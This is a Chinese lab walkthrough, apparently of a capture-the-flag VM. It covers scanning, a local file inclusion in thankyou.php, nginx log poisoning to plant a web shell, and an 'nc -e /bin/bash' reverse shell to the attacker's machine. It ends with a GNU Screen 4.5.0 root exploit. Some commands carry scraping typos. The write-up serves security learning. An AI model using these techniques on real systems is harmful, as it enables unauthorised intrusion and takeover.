广州网站建设新际,企业官网流程,爱站挖词,学校网站建设软件推荐信息收集
主机扫描
sudo arp-scan -l端口扫描
nmap -p- -A 192.168.16.172漏洞发现
浏览器访问靶机IP 在Contact找到类似提交数据的地方 点击submit#xff0c;数字发生变化。不断刷新的话#xff0c;数字依然会发生变化 使用bp抓包发送重发器查看数据包 再次点击发送查看…信息收集
主机扫描
sudo arp-scan -l端口扫描
nmap -p- -A 192.168.16.172漏洞发现
浏览器访问靶机IP 在Contact找到类似提交数据的地方 点击submit数字发生变化。不断刷新的话数字依然会发生变化 使用bp抓包发送重发器查看数据包 再次点击发送查看数据返回包 不断重发数据发现footer不断变化感觉可能存在一个独立的脚本爆破目录查看一下
dirsearch -u 192.168.16.172 -i 200命令解释
dirsearch -u 192.168.16.172 -i 200 是一个用于目录扫描的命令下面对该命令进行详细解释
dirsearch是一个目录扫描工具用于探测Web服务器上的目录和文件。-u 192.168.16.172指定要扫描的目标URL或IP地址。在这个示例中目标是 192.168.16.172。你可以替换这个IP地址为需要扫描的实际目标。-i 200指定要忽略的HTTP状态码。在这个示例中200 表示忽略返回状态码为200的响应。也就是说当目标返回200状态码时不会将其视为敏感路径或文件。
通过执行这条命令dirsearch 工具将发送不同的HTTP请求到目标URL并根据目标服务器的响应来确定是否存在可以访问的目录、文件或敏感路径。它可以帮助发现Web应用程序中可能存在的配置错误、暴露的资源、备份文件等问题。 浏览器访问192.168.16.172这个页面 刷新页面进行查看刷新页面后数字发生变化 将bp数据包中的GET请求更改为/thankyou.php?filefooter.php然后点击发送 再点击发送进行查看 可以确定这里可能存在文件包含漏洞
漏洞利用
再将访问路径改为/etc/passwd可以看到passwd文件 说明了程序代码再处理文件包含是没有严格控制我们可以把访问路径更改为木马文件 发现报了404未找到的错误
对于配置了nginx的网站无论网站有什么操作都会被记录在/var/log/nginx/access.log和/var/log/nginx/error.log中
/thankyou.php?file/var/log/nginx/access.log木马上传成功利用蚁剑进行连接
http://192.168.16.172/thankyou.php?file/var/log/nginx/access.log进行反弹shell
kali进行监听
nc -lvvp 8848 #监听网段中所有8848端口利用蚁剑中的虚拟终端反弹shell到攻击机kali上
nc -e /bin/bash 192.168.16.176 8848再看kali已经连接到了 使用python脚本开启交互模式
python -c import pty;pty.spawn(/bin/bash)查看id发现只是普通用户的权限 权限提升
find / -user root -prem /4000 2/dev/null经过查找得知GNU Screen是一款由GNU计划开发的用于命令行终端切换的自由软件。用户可以通过该软件同时连接多个本地或远程的命令行会话并在其间自由切换。GNU Screen可以看作是窗口管理器的命令行界面版本。它提供了统一的管理多个会话的界面和相应的功能。
尝试用searchsploit搜索是否存在漏洞重新打开一个终端进行漏洞查找
searchsploit screen 4.5.0找出41154.sh的绝对路径
searchsploit -p linx/local/41151.sh查看文件内容
cat /usr/share/exploitdb/exploits/linux/local/41154.sh按照文件的说明可分为三部分将第一个框里内容保存为第一文件名为libhax.c然后使用黄色选取的命令编译编译结束会生成libhax.so文件。
第二个框里内容保存为rootshell.c文件使用黄色选区的命令编译编译结束后生成rootshell文件。
将第三个框里内容保存为第三个文件保存为run.sh 。 这个名字随意。
通过蚁剑把libhax.c和rootshell.c拖进靶机跟目录下的tmp目录下 在虚拟终端中对libhax.c和rootshell.c这两个文件进行编译 在蚁剑中点击文件管理进入根目录下的tmp目录进行刷新后编译的文件就出来了 然后把 run.sh也通过蚁剑拖进靶机根目录下的tmp目录中注意是 /tmp/ 那么原来的libhax.c和rootshell.c这两个文件可以删除了因为已经编译好了留着也没有价值 回到通过python得到的交互式的shell里切换到/tmp目录下 运行run.sh输入bash ./run.sh进行提权 通过查看id已知是root用户
进入/root查看是否有flag 总结
信息收集主机发现 netdiscouver端口扫描 nmap目录爆破 dirsearch
漏洞利用bp抓包分析数据包,测试到有文件包含漏洞木马上传查看日志反弹shellpython交互shell
提权find / -user root -perm /4000 2/dev/null#找到所有具有root权限的可执行文件searchsploit screen 4.5.0#通过searchsploit找到Screen这款由GNU计划开发的用于命令行终端切换的自由软件的漏洞libhax.c和rootshell.c文件的编译 run.shbash ./run.sh 提权
